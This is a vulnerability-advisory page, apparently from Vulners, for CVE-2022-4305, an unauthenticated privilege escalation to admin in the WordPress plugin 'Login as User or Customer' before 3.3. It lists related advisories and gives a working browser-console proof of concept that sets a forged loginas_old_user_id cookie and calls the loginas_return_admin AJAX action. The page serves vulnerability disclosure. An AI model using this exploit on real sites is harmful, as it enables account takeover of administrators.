Unauthenticated Privilege Escalation to Admin via Login Vulnerabilit
Reporter | Title | Published | Views | Family All 6 |
---|---|---|---|---|
![]() | Login as User or Customer < 3.3 - Unauthenticated Privilege Escalation to Admin | 27 Dec 202200:00 | – | wpvulndb |
![]() | Login as User or Customer < 3.3 - Privilege Escalation | 17 Oct 202307:20 | – | nuclei |
![]() | CVE-2022-4305 | 23 Jan 202315:15 | – | nvd |
![]() | CVE-2022-4305 | 23 Jan 202315:15 | – | cve |
![]() | CVE-2022-4305 Login as User or Customer < 3.3 - Unauthenticated Privilege Escalation to Admin | 23 Jan 202314:31 | – | cvelist |
![]() | Authorization | 23 Jan 202315:15 | – | prion |
Run the below command in the developer console of the web browser while being on the blog as an unauthenticated user, then reload the page to be logged in as the user with ID:
document.cookie = "loginas_old_user_id=1";
fetch("/wp-admin/admin-ajax.php?action=loginas_return_admin", {
"method": "GET",
"credentials": "include"
}).then(response => response.text())
.then(data => console.log(data));
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo